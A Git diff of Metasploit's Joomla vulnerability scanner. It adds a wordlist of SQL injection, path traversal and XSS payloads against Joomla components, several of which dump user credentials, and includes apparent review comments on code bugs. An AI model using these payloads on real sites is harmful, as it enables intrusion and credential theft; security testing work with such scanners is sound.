+components/com_flippingbook/ +components/com_flyspray/startdown.php +components/com_fm/fm.install.php +components/com_foevpartners/ +components/com_football/ +components/com_formtool/ +components/com_forum/ +components/com_fq/ +components/com_fundraiser/ +components/com_galeria/ +components/com_galleria/galleria.html.php +components/com_gallery/ +components/com_game/ +components/com_gameq/ +components/com_garyscookbook/ +components/com_genealogy/ +components/com_geoboerse/ +components/com_gigcal/ +components/com_gmaps/ +components/com_googlebase/ +components/com_gsticketsystem/ +components/com_guide/ +components/com_hashcash/server.php +components/com_hbssearch/ +components/com_hello_world/ +components/com_hotproperties/ +components/com_hotproperty/ 
+components/com_hotspots/ +components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php +components/com_hwdvideoshare/ +components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); +components/com_ice/ +components/com_idoblog/ +components/com_idvnews/ +components/com_ignitegallery/ +components/com_ijoomla_archive/ +components/com_ijoomla_rss/ +components/com_inter/ +components/com_ionfiles/ +components/com_is/ +components/com_ixxocart/ +components/com_jabode/ +components/com_jashowcase/ +components/com_jb2/ +components/com_jce/ +components/com_jcs/ +components/com_jd-wiki/ +components/com_jd-wp/ +components/com_jim/ +components/com_jjgallery/ +components/com_jmovies/ +components/com_jobline/ +components/com_jombib/ +components/com_joobb/ +components/com_jooget/ +components/com_joom12pic/ +components/com_joomla-visites/ +components/com_joomla_flash_uploader/ +components/com_joomlaboard/ +components/com_joomladate/ +components/com_joomlaflashfun/ +components/com_joomlalib/ +components/com_joomlaradiov5/ +components/com_joomlavvz/ +components/com_joomlaxplorer/ +components/com_joomloads/ +components/com_joomradio/ +components/com_joomtracker/ +components/com_joovideo/ +components/com_jotloader/ +components/com_journal/ +components/com_jpack/ +components/com_jpad/ +components/com_jreactions/ +components/com_jreviews/scripts/xajax.inc.php +components/com_jumi/ +components/com_juser/ +components/com_jvideo/ +components/com_k2/ +components/com_kbase/ +components/com_knowledgebase/fckeditor/fckeditor.js +components/com_kochsuite / +components/com_kunena/ +components/com_letterman/ +components/com_lexikon/ +components/com_linkdirectory/ +components/com_listoffreeads/ +components/com_livechat/getSavedChatRooms.php +components/com_livechat/xmlhttp.php +components/com_liveticker/ +components/com_lm/ +components/com_lmo/ +components/com_loudmounth/includes/abbc/abbc.class.php +components/com_loudmouth/ +components/com_lowcosthotels/ 
+components/com_lurm_constructor/admin.lurm_constructor.php +components/com_mad4joomla/ +components/com_madeira/img.php +components/com_maianmusic/ +components/com_mailarchive/ +components/com_mailto/ +components/com_mambatstaff/mambatstaff.php +components/com_mambelfish/ +components/com_mambospgm/ +components/com_mambowiki/MamboLogin.php +components/com_marketplace/ +components/com_mcquiz/ +components/com_mdigg/ +components/com_media_library/ +components/com_mediaslide/ +components/com_mezun/ +components/com_mgm/ +components/com_minibb/ +components/com_misterestate/ +components/com_mmp/help.mmp.php +components/com_model/ +components/com_moodle/moodle.php +components/com_moofaq/ +components/com_mosmedia/ +components/com_mospray/scripts/admin.php +components/com_mosres/ +components/com_most/ +components/com_mp3_allopass/ +components/com_mtree/ +components/com_mtree/img/listings/o/{id}.php +components/com_multibanners/extadminmenus.class.php +components/com_myalbum/ +components/com_mycontent/ +components/com_mydyngallery/ +components/com_mygallery/ +components/com_n-forms/ +components/com_na_content/ +components/com_na_mydocs/ +components/com_na_newsdescription/ +components/com_na_qforms/ +components/com_neogallery/ +components/com_neorecruit/ +components/com_neoreferences/ +components/com_netinvoice/ +components/com_news/ +components/com_news_portal/ +components/com_newsflash/ +components/com_nfn_addressbook/ +components/com_nicetalk/ +components/com_noticias/ +components/com_omnirealestate/ +components/com_omphotogallery/ +components/com_ongumatimesheet20/ +components/com_onlineflashquiz/ +components/com_ownbiblio/ +components/com_panoramic/ +components/com_paxgallery/ +components/com_paxxgallery/ +components/com_pcchess/ +components/com_pcchess/include.pcchess.php +components/com_pccookbook/ +components/com_pccookbook/pccookbook.php +components/com_peoplebook/param.peoplebook.php +components/com_performs/ +components/com_philaform/ 
+components/com_phocadocumentation/ +components/com_php/ +components/com_phpshop/toolbar.phpshop.html.php +components/com_pinboard/ +components/com_pms/ +components/com_poll/ +components/com_pollxt/ +components/com_ponygallery/ +components/com_portafolio/ +components/com_portfol/ +components/com_prayercenter/ +components/com_pro_desk/ +components/com_prod/ +components/com_productshowcase/ +components/com_profiler/ +components/com_projectfork/ +components/com_propertylab/ +components/com_puarcade/ +components/com_publication/ +components/com_quiz/ +components/com_rapidrecipe/ +components/com_rdautos/ +components/com_realestatemanager/ +components/com_recly/ +components/com_referenzen/ +components/com_rekry/ +components/com_remository/admin.remository.php +components/com_remository_files/file_image_14/1276100016shell.php +components/com_reporter/processor/reporter.sql.php +components/com_resman/ +components/com_restaurante/ +components/com_ricette/ +components/com_rsfiles/ +components/com_rsgallery/ +components/com_rsgallery2/ +components/com_rss/ +components/com_rssreader/ +components/com_rssxt/ +components/com_rwcards/ +components/com_school/ +components/com_search/ +components/com_sebercart/getPic.php?p=[LFD]%00 +components/com_securityimages/ +components/com_sef/ +components/com_seminar/ +components/com_serverstat/install.serverstat.php +components/com_sg/ +components/com_simple_review/ +components/com_simpleboard/ +components/com_simplefaq/ +components/com_simpleshop/ +components/com_sitemap/sitemap.xml.php +components/com_slideshow/ +components/com_smf/ +components/com_smf/smf.php +components/com_swmenupro/ +components/com_team/ +components/com_tech_article/ +components/com_thopper/ +components/com_thyme/ +components/com_tickets/ +components/com_tophotelmodule/ +components/com_tour_toto/ +components/com_trade/ +components/com_uhp/ +components/com_uhp2/ +components/com_user/controller.php +components/com_users/ 
+components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php +components/com_vehiclemanager/ +components/com_versioning / +components/com_videodb/core/videodb.class.xml.php +components/com_virtuemart/ +components/com_volunteer/ +components/com_vr/ +components/com_waticketsystem/ +components/com_webhosting/ +components/com_weblinks/ +components/com_webring/ +components/com_wmtgallery/ +components/com_wmtportfolio/ +components/com_x-shop/ +components/com_xevidmegahd/ +components/com_xewebtv/ +components/com_xfaq/ +components/com_xgallery/helpers/img.php?file= +components/com_xsstream-dm/ +components/com_ynews/ +components/com_yvcomment/ +components/com_zoom/classes/ +components/mod_letterman/ +components/remository/ +eXtplorer/ +easyblog/entry/uncategorized +extplorer/ +components/com_mtree/img/listings/o/{id}.php where {id} +includes/joomla.php +index.php/404' +index.php/?option=com_question&catID=21' and+1=0 union all +index.php/image-gallery/"><script>alert('xss')</script>/25-koala +index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 +index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view +index.php?option=com_aardvertiser&cat_name=conf&task=<= +index.php?option=com_aardvertiser&task= +index.php?option=com_abc&view=abc&letter=AS§ionid=' +index.php?option=com_advert&id=36' +index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- +index.php?option=com_alfurqan15x&action=viewayat&surano= +index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version +index.php?option=com_annonces&view=edit&Itemid=1 +index.php?option=com_articleman&task=new +index.php?option=com_bbs&bid=-1 +index.php?option=com_beamospetition&startpage=3&pet=- +index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users- +index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27 
+index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1 +index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users-- +index.php?option=com_chronoconnectivity&itemid=1 +index.php?option=com_chronocontact&itemid=1 +index.php?option=com_cinema&Itemid=S@BUN&func=detail&id= +index.php?option=com_clantools&squad=1+ +index.php?option=com_clantools&task=clanwar&showgame=1+ +index.php?option=com_commedia&format=raw&task=image&pid=4&id=964' +index.php?option=com_commedia&task=page&commpid=21 +index.php?option=com_connect&view=connect&controller= +index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../ +index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_dioneformwizard&controller=[LFI]%00 +index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1 +index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 +index.php?option=com_easyfaq&Itemid=1&task=view&gid= +index.php?option=com_easyfaq&catid=1&task=view&id=-2527+ +index.php?option=com_easyfaq&task=view&contact_id= +index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id= +index.php?option=com_equipment&task=components&id=45&sec_men_id= +index.php?option=com_equipment&view=details&id= +index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli] +index.php?option=com_etree&view=displays&layout=category&id=[SQL] +index.php?option=com_etree&view=displays&layout=user&user_id=[SQL] 
+index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 +index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- +index.php?option=com_filecabinet&task=download&cid[]=7 +index.php?option=com_firmy&task=section_show_set&Id=-1 +index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R +index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id= +index.php?option=com_graphics&controller= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp= +index.php?option=com_huruhelpdesk&view=detail +index.php?option=com_huruhelpdesk&view=detail&cid[0]= +index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 +index.php?option=com_iproperty&view=agentproperties&id= +index.php?option=com_jacomment&view= +index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 +index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_jcommunity&controller=members&task=1' +index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13 +index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2 +index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2 +index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00 +index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_jfuploader&Itemid= +index.php?option=com_jgen&task=view&id= 
+index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00 +index.php?option=com_jimtawl&Itemid=12&task= +index.php?option=com_jmarket&controller=product&task=1' +index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1' +index.php?option=com_jomdirectory&task=search&type=111+ +index.php?option=com_joomdle&view=detail&cat_id=1&course_id= +index.php?option=com_joomla_flash_uploader&Itemid=1 +index.php?option=com_joomleague&func=showNextMatch&p=[sqli] +index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli] +index.php?option=com_joomtouch&controller= +index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00 +index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00 +index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users +index.php?option=com_jstore&controller=product-display&task=1' +index.php?option=com_jsubscription&controller=subscription&task=1' +index.php?option=com_jtickets&controller=ticket&task=1' +index.php?option=com_konsultasi&act=detail&sid= +index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en +index.php?option=com_kunena&func=userlist&search= +index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' +index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users-- +index.php?option=com_matamko&controller= +index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm +index.php?option=com_neorecruit&task=offer_view&id= +index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- +index.php?option=com_noticeboard&controller= 
+index.php?option=com_obsuggest&controller= +index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- +index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- +index.php?option=com_oziogallery&Itemid= +index.php?option=com_page&id=53 +index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection] +index.php?option=com_phocagallery&view=categories&Itemid= +index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_php&file=../../../../../../../../../../etc/passwd +index.php?option=com_php&file=../images/phplogo.jpg +index.php?option=com_php&file=../js/ie_pngfix.js +index.php?option=com_ponygallery&Itemid=[sqli] +index.php?option=com_products&catid=-1 +index.php?option=com_products&id=-1 +index.php?option=com_products&product_id=-1 +index.php?option=com_products&task=category&catid=-1 +index.php?option=com_properties&task=agentlisting&aid= +index.php?option=com_qcontacts&Itemid=1' +index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts +index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_restaurantguide&view=country&id='&Itemid=69 +index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' +index.php?option=com_seyret&view= +index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-- +index.php?option=com_smartsite&controller= +index.php?option=com_spa&view=spa_product&cid= +index.php?option=com_spidercalendar +index.php?option=com_spidercalendar&date=1' 
+index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_staticxt&staticfile=test.php&id=1923 +index.php?option=com_szallasok&mode=8&id=25 (SQL) +index.php?option=com_tag&task=tag&tag= +index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users-- +index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users +index.php?option=com_ultimateportfolio&controller= +index.php?option=com_users&view=registration +index.php?option=com_virtuemart&page=account.index&keyword=[sqli] +index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_x-shop&action=artdetail&idd=' +index.php?option=com_x-shop&action=artdetail&idd='[SQLi] +index.php?option=com_xcomp&controller=../../[LFI]%00 +index.php?option=com_xvs&controller=../../[LFI]%00 +index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users-- +index.php?option=com_yjcontactus&view= +index.php?option=com_youtube&id_cate=4 +index.php?option=com_zina&view=zina&Itemid=9 +index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id= +index.php?search=NoGe&option=com_esearch&searchId= +index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube 
+index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users-- +js/index.php?option=com_socialads&view=showad&Itemid=94 +libraries/joomla/utilities/compat/php50x.php +libraries/pcl/pcltar.php +libraries/phpmailer/phpmailer.php +libraries/phpxmlrpc/xmlrpcs.php +modules/mod_artuploader/upload.php"); +modules/mod_as_category.php +modules/mod_calendar.php +modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] +modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream"); +modules/mod_jfancy/script.php"); +modules/mod_ppc_simple_spotlight/elements/upload_file.php +modules/mod_ppc_simple_spotlight/img/ +modules/mod_pxt/ +modules/mod_quick_question.php +modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0 +patch/makedown.php?arquivo=../../../../etc/passwd +plugins/content/efup_files/helper.php"); +plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data"> +plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ +plugins/editors/xstandard/attachmentlibrary.php +print.php?task=person&id=36 and 1=1 +templates/be2004-2/ +templates/ja_purity/ +wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1-- +web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index 37bfc3d17309..7b497d1846b9 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb 
@@ -2,7 +2,7 @@ # $Id: joomla_vulnscan.rb ## ## -#Thanks to @zeroSteiner @kaospunk helping with examples and questions. Also thanks to Joomscan and various MSF modules for code examples. +# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to Joomscan and various MSF modules for code examples. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,30 +21,30 @@ def initialize super( 'Name' => 'Joomla Scanner', 'Description' => %q{ - This module scans a Joomla install for information and potential vulnerabilites. + This module scans a Joomla install for information, plugins and potential vulnerabilites. }, 'Author' => [ 'f8lerror' ], 'License' => MSF_LICENSE ) - register_options( + register_options( [ - OptString.new('PATH', [ true, "The path to the Joomla install", '/']), + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']), OptBool.new('ENUMERATE', [ false, "Enumerate Plugins", true]), OptPath.new('PLUGINS', [ false, "Path to list of plugins to enumerate", - File.join(Msf::Config.install_root, "data", "wordlists", "pcheck.txt") + File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt") ] ) ], self.class) end - def osfingerprint (response) + def osfingerprint(response) if(response.headers.has_key?('Server') ) if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/) os = "Windows" elsif(response.headers['Server'] =~ /Apache\// and response.headers['Server'] !~/(Win32)/) - os = "*Nix" + os = "*Nix" else os = "Unknown Server Header Reporting: "+response.headers['Server'] end @@ -52,8 +52,7 @@ def osfingerprint (response) return os end - def fingerprint (response, app) - + def fingerprint(response, app) if(response.body =~ /<version.*\/?>(.+)<\/version\/?>/i) v = $1 out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" 
@@ -87,58 +86,65 @@ def fingerprint (response, app) return out end - def run_host (ip) - tpath = datastore['PATH'] - if tpath[-1,1] != '/' + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' tpath += '/' - end - apps = [ 'language/en-GB/en-GB.xml', + end + apps = [ 'languaage/en-GB/en-GB.xml', 'templates/system/css/system.css', 'media/system/js/mootools-more.js', 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] - iapps = ['robots.txt','administrator/index.php','/admin/','index.php/using-joomla/extensions/components/users-component/registration-form', + iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] - print_status("Checking Host: #{ip} for version information") + apps.each do |app| - break if check_app(tpath,app,ip) + app_status = check_app(tpath, app, ip) + return if app_status == :abort + break if app_status end - print_status("Scanning #{ip} for interesting pages") + vprint_status("#{peer} - Checking host for interesting pages") iapps.each do |iapp| scan_pages(tpath,iapp,ip) end if datastore['ENUMERATE'] - print_status("Scanning #{ip} for plugins") + vprint_status("#{peer} - Checking host for interesting plugins") bres = send_request_cgi({ 'uri' => tpath, 'method' => 'GET', }, 5) - return if not bres or not bres.body or not bres.code + return false if not bres or not bres.body or not bres.code bres.body.gsub!(/[\r|\n]/, ' ') File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| papp = bapp.chomp plugin_search(tpath,papp,ip,bres) end end - end - def check_app (tpath, app, ip) + def check_app(tpath, app, ip) res = send_request_cgi({ - 'uri' => "#{datastore['PATH']}" << app, + 'uri' => "#{tpath}" << app, 'method' => 'GET', }, 5) - return if not res or not res.body or not res.code + return :abort if 
res.nil? + return false if not res or not res.body or not res.code + vprint_status("#{peer} - Checking host for version information") res.body.gsub!(/[\r|\n]/, ' ') os = osfingerprint(res) - if (res.code.to_i == 200) + if (res.code == 200) out = fingerprint(res,app) return if not out if(out =~ /Unknown Joomla/) - print_error("Unable to identify Joomla Version with this file #{app}") + print_error("#{peer} - Unable to identify Joomla Version with this file #{app}") return false else - print_good("Joomla Version:#{out} from: #{app} ") - print_good("OS: #{os}") + print_good("#{peer} - Joomla Version:#{out} from: #{app} ") + print_good("#{peer} - OS: #{os}") report_note( :host => ip, :port => datastore['RPORT'], 
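Review bot: The first entry of `apps` in run_host is now spelled `'languaage/en-GB/en-GB.xml'`, where the removed line had `'language/en-GB/en-GB.xml'`. That looks like an accidental edit: the first version probe will presumably request a path that does not exist, so fingerprinting always falls through to the less specific files. I would restore `apps = [ 'language/en-GB/en-GB.xml',`. The body of check_app continues in the next hunk.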
@@ -146,44 +152,50 @@ def check_app (tpath, app, ip) :ntype => 'Joomla Version', :data => out ) - return true + return :next_app end - elsif(res.code.to_i == 403 and datastore['VERBOSE']) + elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - print_status("#{ip} denied access to #{url} (SSL Required)") + vprint_status("#{ip} denied access to #{ip} (SSL Required)") elsif(res.body =~ /has a list of IP addresses that are not allowed/) - print_status("#{ip} restricted access by IP") + vprint_status("#{ip} restricted access by IP") elsif(res.body =~ /SSL client certificate is required/) - print_status("#{ip} requires a SSL client certificate") + vprint_status("#{ip} requires a SSL client certificate") else - print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") end end rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort end - def scan_pages (tpath, iapp, ip) + def scan_pages(tpath, iapp, ip) res = send_request_cgi({ - 'uri' => "#{datastore['PATH']}" << iapp, + 'uri' => "#{tpath}" << iapp, 'method' => 'GET', }, 5) - return if not res or not res.body or not res.code + return false if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') - if (res.code.to_i == 200) + if (res.code == 200) if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) - sout = "Administrator Login Page" + sout = "**Administrator Login Page" elsif(res.body =~/Registration/ and res.body 
=~/class="validate">Register<\/button>/) - sout = "Registration Page" + sout = "**Registration Page" else - sout = iapp + sout = iapp end return if not sout if(sout == iapp) - print_good("#{iapp}") - elsif print_good("#{sout}: #{iapp} ") + print_good("#{peer} - Page: #{tpath}#{iapp}") + elsif print_good("#{peer} - Page: #{tpath}#{iapp} #{sout}") report_note( :host => ip, :port => datastore['RPORT'], 
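Review bot: In scan_pages the branch `elsif print_good("#{peer} - Page: #{tpath}#{iapp} #{sout}")` uses the print call itself as the condition, so the `report_note` under it runs only if print_good happens to return a truthy value. The removed line had the same shape, so this is carried over rather than new, but the effect is that administrator login and registration pages are printed and may never be recorded as notes. I would make it a plain `else` with `print_good("#{peer} - Page: #{tpath}#{iapp} #{sout}")` as the first statement of that branch. scan_pages ends in the next hunk.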
@@ -192,58 +204,64 @@ def scan_pages (tpath, iapp, ip) :data => sout ) end - elsif(res.code.to_i == 403 and datastore['VERBOSE']) + elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - print_status("#{ip} denied access to #{url} (SSL Required)") + vprint_status("#{ip} denied access to #{ip} (SSL Required)") elsif(res.body =~ /has a list of IP addresses that are not allowed/) - print_status("#{ip} restricted access by IP") + vprint_status("#{ip} restricted access by IP") elsif(res.body =~ /SSL client certificate is required/) - print_status("#{ip} requires a SSL client certificate") + vprint_status("#{ip} requires a SSL client certificate") else - print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") end end rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort end - def plugin_search (tpath, papp, ip, bres) + def plugin_search(tpath, papp, ip, bres) res = send_request_cgi({ - 'uri' => "#{datastore['PATH']}" << papp, + 'uri' => "#{tpath}" << papp, 'method' => 'GET', }, 5) return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') osize = bres.body.size nsize = res.body.size - if (res.code.to_i == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize) - print_good("Found Plugin: #{papp} ") + if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! 
Administration Login<\/h1>/ and osize != nsize) + print_good("#{peer} - Plugin: #{tpath}#{papp} ") if (papp =~/passwd/ and res.body !~/root/) - print_error("Passwd not found") + vprint_error("#{peer} - Vulnerability: LFI not found") elsif(papp =~/passwd/ and res.body =~/root/) - print_good("Passwd file found in response") + print_good("#{peer} - Vulnerability: Potential LFI") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/) - print_good("Possible SQL Injection") + print_good("#{peer} - Vulnerability: Potential SQL Injection") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/) - print_error("Unable to identify SQL injection") + vprint_error("#{peer} - Vulnerability: Unable to identify SQL injection") elsif(papp =~/>alert/ and res.body !~/>alert/) - print_error("No XSS") + vprint_error("#{peer} - Vulnerability: No XSS") elsif(papp =~/>alert/ and res.body =~/>alert/) - print_good("Possible XSS") + print_good("#{peer} - Vulnerability: Potential XSS") elsif(res.body =~/SQL syntax/ ) - print_good("Possible SQL Injection") + print_good("#{peer} - Vulnerability: Potential SQL Injection") elsif(papp =~/com_/) vars = papp.split('_') pages = vars[1].gsub('/','') res1 = send_request_cgi({ - 'uri' => "#{datastore['PATH']}"<<"index.php?option=com_#{pages}", + 'uri' => "#{tpath}"<<"index.php?option=com_#{pages}", 'method' => 'GET', }, 5) - if (res1.code.to_i == 200) - print_good("Found Page: index.php?option=com_#{pages}") + if (res1.code == 200) + print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}") else - print_error("#{datastore['PATH']}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response") + vprint_error("#{peer} - Page: #{tpath}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response") end end report_note( 
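Review bot: In the `com_` branch of plugin_search the follow-up response is dereferenced without a nil check, `if (res1.code == 200)`, although every other response in this file is guarded before use. If that request gets no response, `res1` is presumably nil (check_app tests `res.nil?` for this case) and the resulting NoMethodError is not among the rescued classes, so the scan of the host stops with an exception. I would write `if res1 and res1.code == 200` and turn the fallback into `elsif res1`, so the error message that reads `res1.code.to_s` is also safe. plugin_search ends in the next hunk.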
